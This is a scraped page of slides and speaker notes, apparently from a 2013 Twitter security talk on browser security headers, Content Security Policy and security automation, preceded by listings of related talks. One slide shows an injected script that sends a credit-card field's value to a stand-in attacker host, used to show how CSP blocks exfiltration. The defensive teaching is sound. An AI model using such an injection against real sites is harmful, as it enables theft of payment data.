This document discusses various techniques for improving application security, including content security policy (CSP), security headers, static and dynamic analysis tools, and monitoring tools. It provides information on how CSP works and how to configure different security headers to harden applications against attacks like cross-site scripting and clickjacking. The document also notes the importance of monitoring applications for security issues and tuning policies based on monitoring data.
Alexis max-Creating a bot experience as good as your user experience - Alexis...WeLoveSEO
Creating a bot experience as good as your user experience: what does technical SEO look like in 2019?
Dans cette conférence en anglais et français, Alexis Sanders et Max Prin, Technical SEOs chez Merkle aux Etats Unis s’attaqueront aux sujets SEO les plus techniques.
Données structurées, budget de crawl, AMP : ils vous livreront les clés pour mettre une point une expérience robot aussi optimisée que celle des utilisateurs.
Redefining technical SEO & how we should be thinking about it as an industry ...WeLoveSEO
It’s time to throw the traditional definition of technical SEO out the window. Why? Because technical SEO is so much bigger than just crawling, indexing, and rendering. Technical SEO is applicable to all areas of SEO, including content development and other creative functions. Join this session to learn how to integrate technical SEO into all areas of your SEO program.
Google Algorithms, Your Site, and Moving towards Mobile First indexing in a Post Update World.
What you need to know about the changes in Google, how it affects your site, and what you can do to stay ahead of the game when Google changes all the rules in an environment of decreasing transparency.
http://fr.droidcon.com/2014/agenda/
http://fr.droidcon.com/2014/agenda/detail?title=Death+to+Passwords
User authentication in mobile applications is a very common and integral use case. Implementing regular passwords is an easy solution for developers but comes with several pitfalls that impair user experience like (re-)entering passwords, the need to create a new unique password or even just the input of personal data on a flaky keyboard while registering a new account.
In this talk the security flaws and UX implications of passwords will be discussed and highlighted which different techniques exist that are able to offer a more mobile friendly flow. Highlighting authorization and authentication techniques like OAuth, OpenID Connect and even hardware features like Bluetooth Low Energy this talk will be interesting for anyone who's facing a situation where creating and storing user accounts matters.
Speaker : Tim Messerschmidt, PayPal
As a long time mobile and web developer, Tim channels his knowledge and experience as PayPal's Lead Developer Evangelist in EMEA. He is passionate about startups and serves as mentor at multiple incubators and accelerators. Prior joining PayPal Tim used to work with Neofonie Mobile and Samsung focussing on several mobile projects. In his spare time, he leads and creates training classes in all sorts of developer-oriented topics, contributes to Open Source projects and is one of the authors of the Mobile Developer's Guide to the Galaxy, as well as numerous articles published in print magazines.
Sucuri Webinar: Defending Your Google Brand Reputation and Analytics ReportsSucuri
Google Analytics and Google Search Console are powerful tools for marketers, but did you know they can also be used to enhance your website security?
Learn how to clear spam from GA reports and mitigate indicators of a website hack.
Sucuri Webinar: How to clean hacked WordPress sitesSucuri
Discovering if your site has been compromised and fixing your site can be quite a tedious and overwhelming task.
Sucuri Remediation Team Lead, Ben Martin presented here the key indicators you should look for when assessing the security of your WordPress site and steps to take to clean your site. Ben provided a guide that is sure to be helpful if your website becomes compromised and minimize the attack time.
Sucuri Webinar: Website Security Primer for Digital MarketersSucuri
During this webinar, Alycia will explain how marketing professionals can easily add security to their diverse toolkit. This skill helps organizations prepare for incidents and prevent others.
Reputation management falls on marketing. By championing the protection of web content, marketers can uphold their company’s reputation and make the web safer for everyone.
Alexis max-Creating a bot experience as good as your user experience - Alexis...WeLoveSEO
Creating a bot experience as good as your user experience: what does technical SEO look like in 2019?
Dans cette conférence en anglais et français, Alexis Sanders et Max Prin, Technical SEOs chez Merkle aux Etats Unis s’attaqueront aux sujets SEO les plus techniques.
Données structurées, budget de crawl, AMP : ils vous livreront les clés pour mettre une point une expérience robot aussi optimisée que celle des utilisateurs.
Redefining technical SEO & how we should be thinking about it as an industry ...WeLoveSEO
It’s time to throw the traditional definition of technical SEO out the window. Why? Because technical SEO is so much bigger than just crawling, indexing, and rendering. Technical SEO is applicable to all areas of SEO, including content development and other creative functions. Join this session to learn how to integrate technical SEO into all areas of your SEO program.
Google Algorithms, Your Site, and Moving towards Mobile First indexing in a Post Update World.
What you need to know about the changes in Google, how it affects your site, and what you can do to stay ahead of the game when Google changes all the rules in an environment of decreasing transparency.
http://fr.droidcon.com/2014/agenda/
http://fr.droidcon.com/2014/agenda/detail?title=Death+to+Passwords
User authentication in mobile applications is a very common and integral use case. Implementing regular passwords is an easy solution for developers but comes with several pitfalls that impair user experience like (re-)entering passwords, the need to create a new unique password or even just the input of personal data on a flaky keyboard while registering a new account.
In this talk the security flaws and UX implications of passwords will be discussed and highlighted which different techniques exist that are able to offer a more mobile friendly flow. Highlighting authorization and authentication techniques like OAuth, OpenID Connect and even hardware features like Bluetooth Low Energy this talk will be interesting for anyone who's facing a situation where creating and storing user accounts matters.
Speaker : Tim Messerschmidt, PayPal
As a long time mobile and web developer, Tim channels his knowledge and experience as PayPal's Lead Developer Evangelist in EMEA. He is passionate about startups and serves as mentor at multiple incubators and accelerators. Prior joining PayPal Tim used to work with Neofonie Mobile and Samsung focussing on several mobile projects. In his spare time, he leads and creates training classes in all sorts of developer-oriented topics, contributes to Open Source projects and is one of the authors of the Mobile Developer's Guide to the Galaxy, as well as numerous articles published in print magazines.
Sucuri Webinar: Defending Your Google Brand Reputation and Analytics ReportsSucuri
Google Analytics and Google Search Console are powerful tools for marketers, but did you know they can also be used to enhance your website security?
Learn how to clear spam from GA reports and mitigate indicators of a website hack.
Sucuri Webinar: How to clean hacked WordPress sitesSucuri
Discovering if your site has been compromised and fixing your site can be quite a tedious and overwhelming task.
Sucuri Remediation Team Lead, Ben Martin presented here the key indicators you should look for when assessing the security of your WordPress site and steps to take to clean your site. Ben provided a guide that is sure to be helpful if your website becomes compromised and minimize the attack time.
Sucuri Webinar: Website Security Primer for Digital MarketersSucuri
During this webinar, Alycia will explain how marketing professionals can easily add security to their diverse toolkit. This skill helps organizations prepare for incidents and prevent others.
Reputation management falls on marketing. By championing the protection of web content, marketers can uphold their company’s reputation and make the web safer for everyone.
Sucuri Webinar: WAF (Firewall) and CDN Feature Benefit GuideSucuri
Sales Enablement Webinar 3 of 4. We will be covering our Firewall and CDN.
A feature benefit guide for our agencies and end users. Why use our firewall? What kind of protection does it offer? How does it affect the efficiency and speed of my site? Will it affect my server's resources? Find out the answers to these questions and more:
- 14 POPs around the world. Find out where.
- Tips on how to sell different CDN and Firewall features.
- Discover how to block different global locations. Yes, you can!
...plus other neat information on obscure settings!
Webinar: CWAF for Mid Market/Enterprise OrganizationsSucuri
In today's complex security landscape, web applications pose a significant risk to Mid-Market and Enterprise organizations.
The question is, how can an organization secure their web properties without sacrificing performance. The answer may be a Cloud-based Web Application Firewall.
This webinar will introduce the concept of the CWAF, and the benefits of web application security in the cloud.
Samples of topics covered include:
- What is a cloud-based web application firewall
- The benefits of using a CWAF
- How to improve security and performance
- How to implement a CWAF in complex web environments
This live Q&A-based webinar is designed for development managers, large websites with unique and complex infrastructure/server environments, and anyone who is concerned about securing their web applications.
Insights provided in the webinar will help you operate more secure networks, infrastructure, and web applications.
You can see the video recording of this webinar at the end of the slides.
Sucuri Webinar: What is SEO Spam and How to Fight ItSucuri
How and why does SEO spam infect a website? This webinar will discuss what attackers gain from spam campaigns and how to deal with it effectively. We will cover different types of SEO spam and why your website can be a target. You will also learn how to protect your website from these attacks.
Topics include:
- What is SEO spam?
- How does SEO spam infect your website, and why?
- Should you worry if you have a small website?
- How to detect SEO spam.
- How to protect your website against SEO spam.
More webinars at https://sucuri.net/webinars
Join us as we delve into the minds of website hackers and reveal how to fight them.
At Sucuri, we clean hundreds of sites daily, so we see the type of malware that’s injected into sites. This gives us a better understanding of why attacks happen.
We’ll dive into the game of website security and explain the reasons behind it all:
- Targeted attacks
- Random attacks
- SEO attacks
- Why me?
Neil Walker from made Notable will discuss secure search, its past, impact and future. It was big news when Google first announced HTTPS as a ranking signal in August 2014, so what impact has this had for businesses, should brands and webmaster update to https and what tools and advise is needed to ensure a website meet Google’s guidelines.
This webinar will cover:
1. History of Https
2. The impact – Winners & Losers
3. Tools and advice to help you switch
4. The future of https as a ranking signal
The life of breached data and the attack lifecycleJarrod Overson
OWASP RTP Presentation on Data breaches, credential spills, the lifespan of data, credential stuffing, the attack lifecycle, and what you can do to protect yourself or your users.
Our Website Hacked Trend Report provides insights on the top open-source CMS security, out-of-date software, and specific malware families we see on hacked websites in the Sucuri environment.
We’ve built this analysis from prior reports to identify the latest tactics, techniques, and procedures (TTPs) detected by our Remediation Group. A total of 18,302 infected websites and 4,426,795 cleaned files were analyzed in our recent publication.
Tony will discuss high-level findings on a range of topics, including:
- Affected open-source CMS applications
- Outdated CMS and blacklist analysis
- Malware families and their effects
Sucuri Webinar: How to Clean a Hacked Magento WebsiteSucuri
TIP: Make sure you scroll to the last slide to view the video recording.
On Feb 22, 2017, Sucuri Incident Responder, Cesar Anjos, presented this webinar as a step by step guide on how to clean a hacked Magento website.
If your Magento website has been hacked, learn how to appropriately deal with the security incident, fix the hack, and secure your ecommerce website against future breaches.
This webinar will take place on Wednesday, Feb 22nd at 11am PST. Following his presentation, Cesar will take questions from participants. Please complete the form to register.
In this webinar you will learn how to:
- Understand if there has been a compromise - Beginner
- Determine the presence of credit card stealers
- Intermediate/Advanced
- Look for the most common credit card stealers - Intermediate
- Handle potential data breaches - Intermediate
- Remove most Magento infections - Beginner
Sucuri Webinar: Simple Steps To Secure Your Online StoreSucuri
During this webinar, we'll discuss some basic security concepts for your online store that include what tools you'll need to remain PCI compliant as well as how to keep your data safe. Some key takeaways will include:
- Reducing Your Attack Surface
- Protecting Cardholder Data
- Creating a Disaster Recovery Plan
We'll also identify principles and practices that can address multiple PCI requirements at once to help save time and effort.
My talk from Digital Elite Day 2020 (Conversion Elite track).
I go over the main changes in browser tracking protections since as early as 2003 (Safari version 1). Then I discuss the impact these tracking protections have on digital analytics, advertising, and experimentation.
In this webinar, we will highlight the different types of hacks, how they work, and what to do post-hack.
We will also share some examples of hacked websites and discuss the most common methods attackers use to target them, plus how they determine if your site is a worthy candidate and how they operate once access is gained.
A few takeaways from this webinar include:
- How do you define a hack?
- What are the OWASP Top 10?
- What is a back door?
- XSS, SQL injection, and others
My presentation titled "Browsers eat data quality for breakfast" from SuperWeek 2020.
The presentation introduces the "tracking protection / prevention / blocking" mechanisms implemented in the major browsers.
The information comes from the www.cookiestatus.com service.
Logs: Understanding Them to Better Manage Your WordPress SiteSucuri
In this webinar we will highlight the various activity, access, and error logs WordPress site administrators have at their fingertips. Plus, learn how logs can best be used to manage, troubleshoot, and most importantly, secure your sites.
From this webinar you will learn how to:
- Highlight suspicious activity before it becomes a security issue.
- Identify possible malicious activity in the log files, allowing you to thwart attacks.
- Trace back a malicious user’s activity in a post-compromise scenario.
- Utilize log file information to better protect, manage, and improve user accountability.
A brief introduction to business models based on creative commons.
___How business can
make more money by sharing___
___How creative commons can be promoted
through illustrating the business potential___
Spreadsheets have a come a long, long way over the years, and plenty of companies today are duking it out to build the best one. So we took a look at the evolution of the spreadsheet and which elements make the best one to serve the way you work today and into the future.
Sucuri Webinar: WAF (Firewall) and CDN Feature Benefit GuideSucuri
Sales Enablement Webinar 3 of 4. We will be covering our Firewall and CDN.
A feature benefit guide for our agencies and end users. Why use our firewall? What kind of protection does it offer? How does it affect the efficiency and speed of my site? Will it affect my server's resources? Find out the answers to these questions and more:
- 14 POPs around the world. Find out where.
- Tips on how to sell different CDN and Firewall features.
- Discover how to block different global locations. Yes, you can!
...plus other neat information on obscure settings!
Webinar: CWAF for Mid Market/Enterprise OrganizationsSucuri
In today's complex security landscape, web applications pose a significant risk to Mid-Market and Enterprise organizations.
The question is, how can an organization secure their web properties without sacrificing performance. The answer may be a Cloud-based Web Application Firewall.
This webinar will introduce the concept of the CWAF, and the benefits of web application security in the cloud.
Samples of topics covered include:
- What is a cloud-based web application firewall
- The benefits of using a CWAF
- How to improve security and performance
- How to implement a CWAF in complex web environments
This live Q&A-based webinar is designed for development managers, large websites with unique and complex infrastructure/server environments, and anyone who is concerned about securing their web applications.
Insights provided in the webinar will help you operate more secure networks, infrastructure, and web applications.
You can see the video recording of this webinar at the end of the slides.
Sucuri Webinar: What is SEO Spam and How to Fight ItSucuri
How and why does SEO spam infect a website? This webinar will discuss what attackers gain from spam campaigns and how to deal with it effectively. We will cover different types of SEO spam and why your website can be a target. You will also learn how to protect your website from these attacks.
Topics include:
- What is SEO spam?
- How does SEO spam infect your website, and why?
- Should you worry if you have a small website?
- How to detect SEO spam.
- How to protect your website against SEO spam.
More webinars at https://sucuri.net/webinars
Join us as we delve into the minds of website hackers and reveal how to fight them.
At Sucuri, we clean hundreds of sites daily, so we see the type of malware that’s injected into sites. This gives us a better understanding of why attacks happen.
We’ll dive into the game of website security and explain the reasons behind it all:
- Targeted attacks
- Random attacks
- SEO attacks
- Why me?
Neil Walker from made Notable will discuss secure search, its past, impact and future. It was big news when Google first announced HTTPS as a ranking signal in August 2014, so what impact has this had for businesses, should brands and webmaster update to https and what tools and advise is needed to ensure a website meet Google’s guidelines.
This webinar will cover:
1. History of Https
2. The impact – Winners & Losers
3. Tools and advice to help you switch
4. The future of https as a ranking signal
The life of breached data and the attack lifecycleJarrod Overson
OWASP RTP Presentation on Data breaches, credential spills, the lifespan of data, credential stuffing, the attack lifecycle, and what you can do to protect yourself or your users.
Our Website Hacked Trend Report provides insights on the top open-source CMS security, out-of-date software, and specific malware families we see on hacked websites in the Sucuri environment.
We’ve built this analysis from prior reports to identify the latest tactics, techniques, and procedures (TTPs) detected by our Remediation Group. A total of 18,302 infected websites and 4,426,795 cleaned files were analyzed in our recent publication.
Tony will discuss high-level findings on a range of topics, including:
- Affected open-source CMS applications
- Outdated CMS and blacklist analysis
- Malware families and their effects
Sucuri Webinar: How to Clean a Hacked Magento WebsiteSucuri
TIP: Make sure you scroll to the last slide to view the video recording.
On Feb 22, 2017, Sucuri Incident Responder, Cesar Anjos, presented this webinar as a step by step guide on how to clean a hacked Magento website.
If your Magento website has been hacked, learn how to appropriately deal with the security incident, fix the hack, and secure your ecommerce website against future breaches.
This webinar will take place on Wednesday, Feb 22nd at 11am PST. Following his presentation, Cesar will take questions from participants. Please complete the form to register.
In this webinar you will learn how to:
- Understand if there has been a compromise - Beginner
- Determine the presence of credit card stealers
- Intermediate/Advanced
- Look for the most common credit card stealers - Intermediate
- Handle potential data breaches - Intermediate
- Remove most Magento infections - Beginner
Sucuri Webinar: Simple Steps To Secure Your Online StoreSucuri
During this webinar, we'll discuss some basic security concepts for your online store that include what tools you'll need to remain PCI compliant as well as how to keep your data safe. Some key takeaways will include:
- Reducing Your Attack Surface
- Protecting Cardholder Data
- Creating a Disaster Recovery Plan
We'll also identify principles and practices that can address multiple PCI requirements at once to help save time and effort.
My talk from Digital Elite Day 2020 (Conversion Elite track).
I go over the main changes in browser tracking protections since as early as 2003 (Safari version 1). Then I discuss the impact these tracking protections have on digital analytics, advertising, and experimentation.
In this webinar, we will highlight the different types of hacks, how they work, and what to do post-hack.
We will also share some examples of hacked websites and discuss the most common methods attackers use to target them, plus how they determine if your site is a worthy candidate and how they operate once access is gained.
A few takeaways from this webinar include:
- How do you define a hack?
- What are the OWASP Top 10?
- What is a back door?
- XSS, SQL injection, and others
My presentation titled "Browsers eat data quality for breakfast" from SuperWeek 2020.
The presentation introduces the "tracking protection / prevention / blocking" mechanisms implemented in the major browsers.
The information comes from the www.cookiestatus.com service.
Logs: Understanding Them to Better Manage Your WordPress SiteSucuri
In this webinar we will highlight the various activity, access, and error logs WordPress site administrators have at their fingertips. Plus, learn how logs can best be used to manage, troubleshoot, and most importantly, secure your sites.
From this webinar you will learn how to:
- Highlight suspicious activity before it becomes a security issue.
- Identify possible malicious activity in the log files, allowing you to thwart attacks.
- Trace back a malicious user’s activity in a post-compromise scenario.
- Utilize log file information to better protect, manage, and improve user accountability.
A brief introduction to business models based on creative commons.
___How business can
make more money by sharing___
___How creative commons can be promoted
through illustrating the business potential___
Spreadsheets have a come a long, long way over the years, and plenty of companies today are duking it out to build the best one. So we took a look at the evolution of the spreadsheet and which elements make the best one to serve the way you work today and into the future.
Every one has got a desire to become a CEO of a Company. But, they lack initiative and unable to influence others. This PPT will help them to understand what makes a CEO and how to become a CEO.
Decentralized Social Networks - WebVisions 2009David Recordon
One theme of 2008 that has led into 2009 is the idea of social networks transforming from monolithic individual sites to peer sites that share people, content, information.
Technologies such as OpenID, OAuth, OpenSocial and Portable Contacts can be combined to help create this vision, though what will it actually look like when it works?
This talk will look at the philosophical changes being led by companies like MySpace, Google, Plaxo and Six Apart, their impact on social networks like Facebook which traditionally haven't embraced this vision, and how these technologies are being used to make this vision reality.
Predicting rainfall using ensemble of ensemblesVarad Meru
The Paper was done in a group of three for the class project of CS 273: Introduction to Machine Learning at UC Irvine. The group members were Prolok Sundaresan, Varad Meru, and Prateek Jain.
Regression is an approach for modeling the relationship between data X and the dependent variable y. In this report, we present our experiments with multiple approaches, ranging from Ensemble of Learning to Deep Learning Networks on the weather modeling data to predict the rainfall. The competition was held on the online data science competition portal ‘Kaggle’. The results for weighted ensemble of learners gave us a top-10 ranking, with the testing root-mean-squared error being 0.5878.
Over the last few years infographics has rocketed into the public consciousness as a visual storytelling method. As with an creative outlet there are the good and bad examples, within this talk we're explore what makes a good infographic, what to consider before you start sketching and work through some methods for creating an infographic. Talking about breaking down the data set to find the best story, constructing the correct story flow, understanding how to construct the clear story and what it is important. Could be useful to anyone who would like to create infographics, improve any skills if they are just starting out, understand how to use infographics as part of their storytelling.
2013: OC Rails Jan - SecureHeaders library and content security policyNeil Matatall
Discusses the various security-related browser response headers and the benefits around them. Also introduces the secureheaders gem (https://github.com/twitter/secureheaders) which simplifies the application
Telco Cloud How operators are using the Cloud to unlock the core network and ...Alan Quayle
Telco Cloud, How operators are using the Cloud to unlock the core network and drive innovation, by Adam Kalsey of Tropo. TADSummit 12-13 November 2014, Istanbul.
In this report, Rishidot Research analyst Sateesh Narahari looks at the data around Serverless Architectures in the public web to analyze if this is a beginning of a new trend in IT.
A Drupalcon Chicago presentation for coders/developers about web application security in the Drupal system. Covering Cross Site Scripting and Cross Site Request Forgeries.
Mitigate Maliciousness -- jQuery Europe 2013Mike West
jQuery has made it possible for developers to move more and more complex application logic down from the server to the client. This is a huge opportunity for JavaScript developers, and at the same time presents a tempting target for folks with malicious intent. It's more critical than ever to ensure that we're doing the right things with regard to security, and happily, modern browsers are here to help. Here, we'll talk about some of the new ways in which you can mitigate the effects of cross-site scripting and other attacks.
When approached with a question, librarians create context for understanding using communication skills and their ability to navigate available resources. IAs can do a similar thing for co-workers inside an organization.
Using my ongoing experience in Special Projects, we’ll look at how IA tools, processes, and thinking can be used to solve support and maintenance issues in an organization. I’ve worked with people in different product groups and roles, including those with direct customer interaction, developers, testers, and various levels of management. I’ve helped them see connections between existing products and technologies, design a complex future product as part of a “task force”, and generally answer (and be able to ask!) all sorts of questions.
Along the way, I’ve discovered and added various tools to my bag of tricks. We’ll take a look at these unexpected tools and how they can be used to explore certain types of information problems.
2012: Putting your robots to work: security automation at TwitterNeil Matatall
How the Twitter product security team does automation and where we're going. All tools in the presentation were built on open source technology and will be open sourced over time.
Credentials are not passed around when source code is shared.
Unintentional exposure of source code does not reveal credentials.
Read-access to source code can be much more permissive.
Source code can be checked into version control systems without concern for exposure of credentials.
It is easier to change credentials without having to worry about changing all instances.
Leaving credentials in source code leads to poor password management in general. If changing a credential requires you to change code, you are less likely to want to do it.
2. @LASCONATX April 2013
@ndm | @SeeEssPee | @sadb | @twittersecurity
It’s all about me
I’ve been called a jackass
I’ve been called an “appsechole”
I have opinions
Opinions are often wrong
Please disagree with me
That’s how we learn
10. @LASCONATX April 2013
@ndm | @SeeEssPee | @sadb | @twittersecurity
Do you use these?
Content security policy
X-Frame-Options
HTTP Strict Transport Security
X-Xss-Protection
X-Content-Type-Options
11. @LASCONATX April 2013
@ndm | @SeeEssPee | @sadb | @twittersecurity
I’m already bored
Time to get awesomer
12. @LASCONATX April 2013
@ndm | @SeeEssPee | @sadb | @twittersecurity
Security headers
Leverage the browser for security
13. @LASCONATX April 2013
@ndm | @SeeEssPee | @sadb | @twittersecurity
Sweeeeet. I don’t have write secure code!
16. @LASCONATX April 2013
@ndm | @SeeEssPee | @sadb | @twittersecurity
X-ContentType-Options
Fixes mime sniffing attacks
Only applies to IE, because only IE would do something
like this
X-Content-Type-Options = ‘nosniff’
zzzzZZZZZZzzzzz
17. @LASCONATX April 2013
@ndm | @SeeEssPee | @sadb | @twittersecurity
X-Xss-Protection
Use the browser’s built in XSS Auditor
X-Xss-Protection: [0-1](; mode=block)?
X-Xss-Protection: 1; mode=block
zzzzZZZ... huh? zzzzzzzz
18. @LASCONATX April 2013
@ndm | @SeeEssPee | @sadb | @twittersecurity
X-Frame-Options
Protects you from most classes of
Clickjacking
X-Frame-Options: DENY
X-Frame-Options: SAMEORIGIN
X-Frame-Options: ALLOW FROM example.com
zzz... oh hey thats cool. Don’t frame my stuff.
20. @LASCONATX April 2013
@ndm | @SeeEssPee | @sadb | @twittersecurity
Firesheep/SSL Strip
Given I don’t have an HSTS header
And I have a session
When I visit http://example.com
Then I am pwned
21. @LASCONATX April 2013
@ndm | @SeeEssPee | @sadb | @twittersecurity
Other ssl fails
Posting passwords over HTTP
Loading mixed content
Using protocol relative URLS
23. @LASCONATX April 2013
@ndm | @SeeEssPee | @sadb | @twittersecurity
How hard is it to use?
Base Case
Strict-transport-security: max-age=10000000
Do all of your subdomains support SSL?
Strict-transport-security: max-age=10000000; includeSubdomains
24. @LASCONATX April 2013
@ndm | @SeeEssPee | @sadb | @twittersecurity
Content secur-a-wat?
Content security policy is reshaping the security model
It is a complicated spec with great differences across browsers
It is not widely adopted
However!
It completely eliminates reflected and stored XSS
It ensures that you never load mixed content
It allows you to accept arbitrary html code from users
26. @LASCONATX April 2013
@ndm | @SeeEssPee | @sadb | @twittersecurity
QuickTime™ and a
H.264 decompressor
are needed to see this picture.
27. @LASCONATX April 2013
@ndm | @SeeEssPee | @sadb | @twittersecurity
Get rid of XSS, eh?
A script-src directive that doesn’t contain ‘unsafe-inline’ almost
eliminates most forms of cross site scripting.
I WILL NOT WRITE INLINE JAVASCRIPT
I WILL NOT WRITE INLINE JAVASCRIPT
I WILL NOT WRITE INLINE JAVASCRIPT
I WILL NOT WRITE INLINE JAVASCRIPT
I WILL NOT WRITE INLINE JAVASCRIPT
I WILL NOT WRITE INLINE JAVASCRIPT
I WILL NOT WRITE INLINE JAVASCRIPT
30. @LASCONATX April 2013
@ndm | @SeeEssPee | @sadb | @twittersecurity
But I have to...
OK, then I’ll inject:
<script>
var image = new Image();
image.src = “cyberhacker.com/steal?data=”+ $(‘#credit_card’).val();
</script>
FALSE! img-src violation, no XHR allowed
33. @LASCONATX April 2013
@ndm | @SeeEssPee | @sadb | @twittersecurity
How to apply?
Secure headers! (poor name, I know)
Open sourced earlier this year
https://github.com/twitter/secureheaders
34. @LASCONATX April 2013
@ndm | @SeeEssPee | @sadb | @twittersecurity
How does it work?
It sets a before_filter that applies each header
Values are based on options passed to filter, or in an initializer
Easily overridden
Secure by default!!!
35. @LASCONATX April 2013
@ndm | @SeeEssPee | @sadb | @twittersecurity
What about that security policy thingy
There are > 6 differences between these two header values
36. @LASCONATX April 2013
@ndm | @SeeEssPee | @sadb | @twittersecurity
Yay for standards
https://t.co/f26WWx3r7y
38. @LASCONATX April 2013
@ndm | @SeeEssPee | @sadb | @twittersecurity
Long hair don’t care
About browser inconsistencies
39. @LASCONATX April 2013
@ndm | @SeeEssPee | @sadb | @twittersecurity
W3
Get involved!!!
Key results from F2F in San Jose
40. @LASCONATX April 2013
@ndm | @SeeEssPee | @sadb | @twittersecurity
Line numbers and column numbers
Previously, a report that was caused by inline scripts/styles was cryptic
Original FF implementation contained a script-sample
Evals/inserting script into DOM would be buried in minified JS
41. @LASCONATX April 2013
@ndm | @SeeEssPee | @sadb | @twittersecurity
“sudo for javascript”
Bookmarklets/plugins/etc
How should they behave?
Bookmarklets show clear intention
Plugins somewhat questionable
Need to live outside the control of the parent page
But how?
42. @LASCONATX April 2013
@ndm | @SeeEssPee | @sadb | @twittersecurity
Reporting cross-origin
Original implementation did not allow CSP reports to be sent to a URI
that does not match the same origin policy, using the eTLD
e.g. https://ads.twitter.com can send reports to https://twitter.com,
but not http://twitter.com or https://support.twitter.com or https://twitter.com:3000
As a result of the w3 face to face, the 1.0 spec shall say that reports can
be sent anywhere!
However, cross-origin requests not allowed by CORS will be “unauthenticated”
43. @LASCONATX April 2013
@ndm | @SeeEssPee | @sadb | @twittersecurity
script-(nonce|hash)
The clash of the titans
My name is Alex Smolen, this is Neil Matatall and this is Justin Collins. We're on Twitter's Product Security team and today we're going to talk to you about security automation at Twitter.
Content security policy defines what can "run" on a page and any deviation creates an alert. And Twitter was an early adopter. We saw that this could not only potentially protect our users, but give a large number of data points as to what the user is experiencing. We have used CSP to help detect XSS and mixed-content by leveraging the reports sent to us by the users' browsers. This compliments the static and dynamic analysis provided by brakeman and phantom-gang in a unique way as we are receiving information from the user. We send the CSP reports to a central scribe host (describe: massively scalable endpoint to collect and aggregate large amounts of data) which writes to hadoop file system which we can run "big data" reports against using pig/scalding. We send this information to SADB where we can search and sort more easily.
With the help of whitehats, we tracked down and fixed a lot of these bugs.
For example, we can use static analysis to check for common coding problems, dynamic analysis for obvious problems on websites, and maybe CSP to get XSS reports to us sooner
The first is that we believe writing secure code is not just a technical challenge, but also a social one, and tools should be built based on supporting and enhancing existing social processes. Unless it's one person writing, analyzing, and shipping code, then communicating about vulnerabilities is just as a important as finding them. And effective communication is really hard. We're not talking about emailing a huge report of maybe bugs to a project manager. We're talking about delivering all of the necessary information to diagnose and fix a vulnerability in a simple and user-centered view.
The next principle is about finding and fixing things as quickly as possible. It's not a new idea, but as a guiding principle it leads you to be ruthless about bottlenecks, latencies, and root causes.
There's a lot of ways to find security problems, and you get diminishing returns from each. We have tools that live on our servers, tools that live outside our server, tools that live in our users browsers, all meant to catch different types of issues.
Most people want to do the right thing. We want to make it easy for them.
Take a survey
Many of these headers not encourage best practices while providing a better user experience and saving resources
save resources since nothing is framed
Twitter has had clickjacking problems in the past. While xfo does not solve all clickjacking issues, it does solve a very common case and is generally a very quick win that is easy to integrate.
hsts preload and max-age
Explain how redirecting to https doesn’t protect the initial request Save round trip
Explain mixed content: MITM assets Firesheep Cookies sent Supported in webkit (phantomjs) accept arbitrary and safe because inserted scripts won’t execute on* events javascript uris restrict using eval
script tag on* events javascript: hrefs Even mention inline style As a policy, no inline script should be added, moratorium on inline script well received
A report from one of our wonderful whitehat reporters gave us a drop of happiness when he said that a successful xss attempt had been thwarted by CSP. TRANSITION: we took stock of what headers were implemented on our properties, and we were not satisfied. They were applied inconsistently and a by a variety of one-off methods.
Mention github blog post There are a few, mostly well known, ways to solve this - data attributes, blocks of code parsed as json mention the application of the header
strings or hashes
Caching and hosted content concerns
Talk about custom elements, being able to attach one way behavior like framing in a sandbox solving the clickjackable follow button html dom aware templating resource integrity
Yeah, some browsers protect you, but not all support it
Given that the browsers give us some baked in security and they take a relatively small amount of effort to implement, why aren't they more common? It’s a non-intrusive, easily configured way of enxuring that all requests get the necessary headers applied. We created a gem for Rails applications, and we intend to apply the same logic to our other frameworks as well.
Content security policy defines what can "run" on a page and any deviation creates an alert. And Twitter was an early adopter. We saw that this could not only potentially protect our users, but give a large number of data points as to what the user is experiencing. We have used CSP to help detect XSS and mixed-content by leveraging the reports sent to us by the users' browsers. This compliments the static and dynamic analysis provided by brakeman and phantom-gang in a unique way as we are receiving information from the user. We send the CSP reports to a central scribe host (describe: massively scalable endpoint to collect and aggregate large amounts of data) which writes to hadoop file system which we can run "big data" reports against using pig/scalding. We send this information to SADB where we can search and sort more easily.